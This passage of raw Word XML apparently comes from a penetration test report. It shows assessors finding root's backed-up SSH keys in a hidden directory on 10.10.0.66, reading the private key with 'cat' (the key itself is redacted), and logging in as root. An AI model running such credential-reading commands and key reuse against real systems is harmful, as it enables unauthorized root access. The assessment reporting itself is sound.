                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cat </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>.backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>id_rsa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="21AE1BF5" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>-----BEGIN RSA PRIVATE KEY-----</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F7343AC" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="0055639E" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>MIIEpQIBAAK</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>[REDACTED]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73F7E3C4" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="004956AA" w:rsidRDefault="00F351BE" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="259" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="0070C0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0055639E">
              <w:rPr>
                <w:color w:val="0070C0"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>...omitted for brevity...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D410EA8" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="007B579A" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>www-data User Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C136BFD" w14:textId="46679182" w:rsidR="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00D22A7D">
      <w:r>
        <w:t xml:space="preserve">At this point in the assessment, the Hyperthetical team had two user shells on </w:t>
      </w:r>
      <w:r w:rsidRPr="00033EC8">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r w:rsidRPr="00F351BE">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F351BE">
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>www-data</w:t>
      </w:r>
      <w:r w:rsidRPr="00F351BE">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F51EC4F" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00343A40">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="328D9F" w:themeColor="accent1" w:themeShade="BF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB6C0F6" w14:textId="59B4FCC5" w:rsidR="00646037" w:rsidRPr="00646037" w:rsidRDefault="00646037" w:rsidP="00646037">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exploitation and Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250B6542" w14:textId="5E67368A" w:rsidR="00F351BE" w:rsidRDefault="00F351BE">
      <w:r>
        <w:t xml:space="preserve">While signed into the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F351BE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>gibson</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account, the assessment team discovered a hidden </w:t>
      </w:r>
      <w:r w:rsidRPr="00F351BE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> backup file named </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>.backup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B51413">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. The hidden directory contained another directory, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F351BE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F351BE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F351BE">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, that contained backups of the root user </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> keys. </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F351BE" w14:paraId="3B5D4EE8" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4C64B5A0" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>gibson@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>nbnserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:~</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>$ ls -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>latr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> /.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>root.backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E988BE6" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00F351BE">
              <w:t>total 12</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D3BC90D" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>drwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve">-x 24 root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> 4096 Apr </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>21  2019</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> ..</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="099CD10A" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>drwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>x  3</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> 4096 Apr 21  2019 .</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="600C33E3" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>drwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>x  2</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> 4096 Apr 21  2019 .</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="4F2F81B3" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>gibson@</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>nbnserver</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>:~</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>$ ls -</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>latr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> /.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>root.backup</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>ssh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6C8FA1FE" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:r w:rsidRPr="00F351BE">
              <w:t>total 20</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D4671AD" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>rwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve">-x 1 root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve">  396</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> Apr 21  2019 id_rsa.pub</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7283E2F8" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>rwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve">-x 1 root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> 1679 Apr </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>21  2019</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>id_rsa</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="48A73E3A" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>drwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve">-x 3 root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> 4096 Apr </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>21  2019</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> ..</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="530B13E8" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="00F351BE" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
            <w:pPr>
              <w:pStyle w:val="Important"/>
            </w:pPr>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>rwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve">-x 1 root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve">  396</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> Apr 21  2019 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>authorized_keys</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="44A9A64A" w14:textId="6B078724" w:rsidR="00F351BE" w:rsidRPr="004956AA" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
            <w:pPr>
              <w:pStyle w:val="BoxCode"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>drwxr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>xr</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve">-x 2 root </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>root</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> 4096 Apr </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t>21  2019</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00F351BE">
              <w:t xml:space="preserve"> .</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="05A8F4F3" w14:textId="77777777" w:rsidR="00F351BE" w:rsidRPr="007B579A" w:rsidRDefault="00F351BE" w:rsidP="00F351BE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>www-data User Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02154C96" w14:textId="77777777" w:rsidR="00343A40" w:rsidRDefault="00F351BE">
      <w:r>
        <w:t xml:space="preserve">The assessors compared the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00343A40">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00343A40">
        <w:t xml:space="preserve"> public key to the key in the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00343A40">
        <w:t>authorized_keys</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00343A40">
        <w:t xml:space="preserve"> file and discovered that they were the same. They downloaded the keys and used them to log into the </w:t>
      </w:r>
      <w:r w:rsidR="00343A40" w:rsidRPr="00343A40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>10.10.0.66</w:t>
      </w:r>
      <w:r w:rsidR="00343A40">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00343A40" w:rsidRPr="00343A40">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidR="00343A40">
        <w:t xml:space="preserve"> account using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00343A40">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00343A40">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00343A40" w14:paraId="3BC1BA69" w14:textId="77777777" w:rsidTr="006F27F5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="0627D044" w14:textId="77777777" w:rsidR="00343A40" w:rsidRPr="00F62F5D" w:rsidRDefault="00343A40" w:rsidP="006F27F5">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F62F5D">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>(</w:t>
